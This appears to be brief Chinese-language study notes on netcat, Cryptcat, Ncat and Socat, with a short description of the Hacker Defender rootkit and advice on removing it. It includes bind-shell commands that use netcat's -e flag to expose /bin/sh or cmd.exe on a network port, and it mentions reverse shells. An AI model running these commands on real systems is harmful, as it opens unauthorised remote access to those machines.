瑞士军刀:NetCat
监听方:nc -l -p 1234
连接方:nc ip 1234
传文件:
nc -l -p 7777 > calc.exe
nc ip 7777 < calc.exe
打开shell:-e参数
nc -l -p 8888 -e /bin/sh
nc.exe -L -p 8888 -e c:\windows\system32\cmd.exe
NetCat的加密版本:Cryptcat
crpytcat -l -p 7777
cryptcat ip 7777
rootkit
rootkit的名字由单词root和kit派生出来的,root意思是拥有管理员的权限,kit则表示软件包提供了工具的集合。
Hack Defender:一款rootkit
三个主要文件:hxdef100.exe, hxdef100.ini, bdcli100.exe
可以隐藏文件夹、进程、注册表等
rootkit难以删除,有时需要将感染的硬盘挂载到另一个系统中进行全面的查杀。
通常最好的办法还是简单地擦出系统,即完全格式化,重装。(这个。。。。)
Netcat高级特性
做代理、反向shell、端口扫描、创建和复制磁盘分区镜像,以及连接netcat实例实现从一台计算机到另一台计算机反弹流量等。
其他工具
Ncat
是现代版的netcat,它是nmap项目的组成部分。ncat相对于最初的netcat工具的改进之处在于:netcat在旧版的基础上进行了改造,为很多原始功能提供了SSL和IPV6的支持。
Socat
它在读写网络流量方面非常出色;同样也扩展了netcat的原始功能,增加了ssl、ipv6和一些其他的高级特性。